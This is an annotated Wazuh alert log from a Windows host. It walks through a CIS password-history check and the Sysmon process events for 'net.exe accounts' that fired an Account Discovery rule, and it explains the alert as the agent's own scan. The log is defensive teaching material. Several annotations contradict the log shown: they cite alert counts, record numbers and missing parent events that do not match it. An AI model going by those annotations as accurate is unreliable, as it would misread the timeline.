data.sca.check.rationale: The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.1 CIS benchmark control this single check maps to; same value as rule.cis.
data.sca.check.compliance.cis_csc: 5.2 CIS Critical Security Controls safeguard this check maps to; same value as rule.cis_csc.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2155758 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event; Security‑Auditing is the provider behind the Security log.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} GUID of that provider – the stable identifier behind providerName.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 Event schema version; field layout can differ between versions of the same Event ID.
data.win.system.level: 0 Numeric ETW level; 0 = Log Always, which is what audit events use.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:56.4609484Z Timestamp (UTC) at which Windows recorded the event – the anchor for your timeline.
data.win.system.eventRecordID: 43897 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that wrote the event to the log, not the process the event describes.
data.win.system.threadID: 2444 Thread ID within that logging process.
data.win.system.channel: Security Event log channel the event was read from.
data.win.system.computer: Attacker Computer name that recorded the event.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well‑known Local System SID.
data.win.eventdata.subjectUserName: ATTACKER$ Account that requested the logon; the trailing $ marks the computer account itself.
data.win.eventdata.subjectDomainName: WORKGROUP Domain or workgroup of the requesting account.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session ID of the requester. 0x3e7 (999) is the well‑known SYSTEM session.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was actually logged on (the New Logon section of the message).
data.win.eventdata.targetUserName: SYSTEM Account that was logged on – the name to pivot on when chasing later process events.
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the logged‑on account; NT AUTHORITY marks a built‑in account.
data.win.eventdata.targetLogonId: 0x3e7 Logon session ID created by this logon; the Sysmon process events below carry LogonId 0x3E7 and so belong to this session.
data.win.eventdata.logonType: 5 Numeric logon type. 5 = Service: a service started by the Service Control Manager, which matches services.exe as the requesting process.
data.win.eventdata.logonProcessName: Advapi Trusted logon process that requested the session; Advapi means the logon came through the LogonUser API.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package used; Negotiate selects Kerberos or NTLM at runtime.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} GUID used to correlate with KDC (Kerberos) events; all zeros means no ticket was involved, so there is nothing to correlate.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks. 0 here means no session key was requested, as the message text states.
data.win.eventdata.processId: 0x304 PID (hex) of the process that requested the logon; 0x304 = 772.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Process that requested the logon. services.exe is the Service Control Manager, the expected requester for a type‑5 logon.
data.win.eventdata.impersonationLevel: %%1833 Windows resource‑string ID; renders as "Impersonation" in the message text.
data.win.eventdata.virtualAccount: %%1843 Windows resource‑string ID; renders as "No" (not a virtual account).
data.win.eventdata.targetLinkedLogonId: 0x0 ID of the linked (split UAC token) logon session; 0x0 means there is none.
data.win.eventdata.elevatedToken: %%1842 Windows resource‑string ID; renders as "Yes" (the session holds a full administrative token).
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2163095 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; here Sysmon, so the eventID is a Sysmon ID (1 = Process Create), not a Security‑log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider – the stable identifier behind providerName.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Event schema version; field layout can differ between versions of the same Event ID.
data.win.system.level: 4 Numeric ETW level; 4 = Informational.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:56.6411308Z Timestamp (UTC) at which Windows recorded the event – the anchor for your timeline.
data.win.system.eventRecordID: 288443 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the event to the log (the Sysmon service), not the process the event describes.
data.win.system.threadID: 4740 Thread ID within that logging process.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the event was read from.
data.win.system.computer: Attacker Computer name that recorded the event.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:56.629
ProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00}
ProcessId: 9628
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:56.629 Process creation time (UTC) as recorded by Sysmon.
data.win.eventdata.processGuid: {94294ddc-be34-680a-ff0b-000000000e00} Sysmon's globally unique ID for the new process; unlike a PID it is never reused, so use it to link parent and child events.
data.win.eventdata.processId: 9628 PID of the new process.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe Full path of the executable that was launched.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) File version from the binary's version resource.
data.win.eventdata.description: Net Command Description string from the binary's version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the binary's version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the binary's version resource.
data.win.eventdata.originalFileName: net.exe Original file name from the version resource; it survives an on‑disk rename, so compare it with image to spot renamed binaries.
data.win.eventdata.commandLine: net.exe accounts Full command line of the new process – the field that tells you what net.exe was actually asked to do.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory of the new process; here the Wazuh agent's install folder.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the new process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon's GUID for the logon session the process belongs to.
data.win.eventdata.logonId: 0x3e7 Logon session ID of the process; 0x3e7 is the SYSTEM session created by the 4624 event above.
data.win.eventdata.terminalSessionId: 0 Windows session number; 0 is the non‑interactive services session.
data.win.eventdata.integrityLevel: System Integrity level of the process token (Low, Medium, High, System).
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 Hash of the image file as configured in Sysmon; compare against a known‑good copy of net.exe before trusting the binary.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} Sysmon GUID of the parent process.
data.win.eventdata.parentProcessId: 3244 PID of the parent process.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe Executable of the parent. Here the Wazuh agent itself spawned net.exe, and the command line matches the SCA check command ('net.exe accounts') from the password‑history check, so this discovery alert is explained by the benchmark scan rather than by an intruder.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" Full command line of the parent process.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2168328 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; here Sysmon, so the eventID is a Sysmon ID (1 = Process Create), not a Security‑log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider – the stable identifier behind providerName.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Event schema version; field layout can differ between versions of the same Event ID.
data.win.system.level: 4 Numeric ETW level; 4 = Informational.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.1756159Z Timestamp (UTC) at which Windows recorded the event – the anchor for your timeline.
data.win.system.eventRecordID: 288447 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the event to the log (the Sysmon service), not the process the event describes.
data.win.system.threadID: 4740 Thread ID within that logging process.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the event was read from.
data.win.system.computer: Attacker Computer name that recorded the event.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.169
ProcessGuid: {94294ddc-be35-680a-020c-000000000e00}
ProcessId: 17256
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00}
ParentProcessId: 9628
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" End of Sysmon's rendered message. The eventdata fields below carry the same values already parsed, so filter and alert on those rather than on this string.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.169 Time the process was created (UTC), as stamped by Sysmon; system.systemTime is the later write-to-log time.
data.win.eventdata.processGuid: {94294ddc-be35-680a-020c-000000000e00} Sysmon's unique process identifier. PIDs are reused, GUIDs are not, so join parent to child on GUIDs.
data.win.eventdata.processId: 17256 PID of the new process. Only meaningful together with processGuid or a tight time window.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe Executable that started. net1.exe is the helper that net.exe hands most subcommands to, so every `net` command produces a net.exe event followed by a net1.exe event. The SysWOW64 path means a 32‑bit process launched it: the command line asked for system32 and WOW64 file-system redirection substituted the 32‑bit copy.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) Version string from the PE resource; a Microsoft path carrying an unexpected version or description is worth a second look.
data.win.eventdata.description: Net Command Description string from the PE resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE resource. This is metadata anyone can set, not a signature check.
data.win.eventdata.originalFileName: net1.exe Internal name from the PE header. If it disagrees with the file name in image, the binary was renamed (a common masquerading tell).
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts Exact command line. `net accounts` prints the local password and lockout policy, which is what rule 92031 maps to T1087 Account Discovery.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory, inherited from the parent: the Wazuh agent's own install directory, the first sign that the agent launched this command.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon identifier for the logon session; pivot on it to see everything else started under the same logon.
data.win.eventdata.logonId: 0x3e7 Windows logon ID. 0x3e7 (999) is the well-known SYSTEM logon session, held by services rather than by an interactive user.
data.win.eventdata.terminalSessionId: 0 Session 0 is the non-interactive services session; interactive users land in session 1 or higher.
data.win.eventdata.integrityLevel: System Mandatory integrity level of the process.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 Hash of the image file (algorithms set in the Sysmon config). Use it to confirm this is the stock Windows net1.exe and to find the same binary on other hosts.
data.win.eventdata.parentProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00} Sysmon GUID of the parent. Its own Event ID 1 is not in this excerpt, so the chain above net.exe cannot be confirmed from here alone; search for this GUID as processGuid.
data.win.eventdata.parentProcessId: 9628 PID of the parent.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe Parent executable: the net.exe front end that spawned this net1.exe.
data.win.eventdata.parentCommandLine: net.exe accounts Parent's command line, the same `net accounts` invocation.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2173383 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon, not the Security log, so eventID below uses Sysmon's numbering.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider; identical on every host, so a reliable filter key.
data.win.system.eventID: 1 Sysmon Event ID 1 = Process Create, the Sysmon counterpart of Security 4688, with the hashes, process GUIDs and parent details that 4688 lacks. Not a classic Security log ID.
data.win.system.version: 5 Schema version of this event type; field layout can change between Sysmon versions.
data.win.system.level: 4 Numeric level; 4 = Informational (severityValue is the text form).
data.win.system.task: 1 Task number; for Sysmon it mirrors the event ID (1 = Process Create).
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; Sysmon stamps the same value on all its events, so it carries no signal here.
data.win.system.systemTime: 2025-04-24T22:41:57.2713241Z Time the event was written to the log (UTC), a few milliseconds after eventdata.utcTime, when the process was actually created.
data.win.system.eventRecordID: 288452 Incremental log record number – handy for timeline order. The three events in this excerpt are records 288452, 288454 and 288458, all within a quarter of a second: one net.exe/net1.exe pair per SCA check, which is also why rule.firedtimes climbs 9, 10, 11.
data.win.system.processID: 3712 PID of the process that logged the event, i.e. the Sysmon service itself, not the process being created (that is eventdata.processId).
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel; the Wazuh agent must subscribe to it with an eventchannel <localfile> entry for these alerts to exist at all.
data.win.system.computer: Attacker Hostname as recorded by Windows; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.264
ProcessGuid: {94294ddc-be35-680a-030c-000000000e00}
ProcessId: 10832
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" End of Sysmon's rendered message; the parsed eventdata fields below carry the same values.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.264 Process creation time (UTC) stamped by Sysmon.
data.win.eventdata.processGuid: {94294ddc-be35-680a-030c-000000000e00} Sysmon's unique process identifier; the net1.exe event that follows names this GUID as its parentProcessGuid.
data.win.eventdata.processId: 10832 PID of the new process; reused after exit, so pair with processGuid.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe Executable that started: the 32‑bit copy from SysWOW64, because the 32‑bit Wazuh agent (Program Files (x86)) launched it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Version string from the PE resource.
data.win.eventdata.description: Net Command Description string from the PE resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE resource (metadata, not a signature check).
data.win.eventdata.originalFileName: net.exe Internal name from the PE header; matches image, so the file was not renamed.
data.win.eventdata.commandLine: net.exe accounts Exact command line: the local password and lockout policy query that rule 92031 maps to T1087 Account Discovery.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory inherited from the parent: the Wazuh agent's install directory.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the process runs as; the agent service runs as SYSTEM and its children inherit that.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon identifier for the logon session.
data.win.eventdata.logonId: 0x3e7 0x3e7 (999) is the well-known SYSTEM logon session.
data.win.eventdata.terminalSessionId: 0 Session 0: the non-interactive services session.
data.win.eventdata.integrityLevel: System Mandatory integrity level of the process.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 Hash of net.exe (algorithms set in the Sysmon config); confirm it is the stock binary.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} Sysmon GUID of the parent; search for it as processGuid to find the agent's own start-up event.
data.win.eventdata.parentProcessId: 3244 PID of the parent.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe The Wazuh agent itself spawned net.exe. This is the agent's SCA scan running the check command shown in the SCA alert below (data.sca.check.command: net.exe accounts), so the discovery alert is self-inflicted. Before tuning rule 92031 down, confirm the agent binary's hash and that the SCA policy really contains this command; a process tree alone is not proof of benign intent on a host that may be compromised.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" Parent's command line: the service started with no arguments.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2178620 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event (Sysmon, not the Security log).
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider; identical on every host.
data.win.system.eventID: 1 Sysmon Event ID 1 = Process Create (the Sysmon counterpart of Security 4688).
data.win.system.version: 5 Schema version of this event type.
data.win.system.level: 4 Numeric level; 4 = Informational.
data.win.system.task: 1 Task number; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; the same on all Sysmon events.
data.win.system.systemTime: 2025-04-24T22:41:57.3746343Z Time the event was written to the log (UTC); eventdata.utcTime is the creation time.
data.win.system.eventRecordID: 288454 Incremental log record number – handy for timeline order; two records after the parent net.exe event (288452).
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process being created.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the Wazuh agent subscribes to.
data.win.system.computer: Attacker Hostname as recorded by Windows; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.369
ProcessGuid: {94294ddc-be35-680a-050c-000000000e00}
ProcessId: 11376
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be35-680a-030c-000000000e00}
ParentProcessId: 10832
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" End of Sysmon's rendered message; the parsed eventdata fields below carry the same values.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.369 Process creation time (UTC), about 100 ms after the parent net.exe was created.
data.win.eventdata.processGuid: {94294ddc-be35-680a-050c-000000000e00} Sysmon's unique process identifier.
data.win.eventdata.processId: 11376 PID of the new process; pair with processGuid.
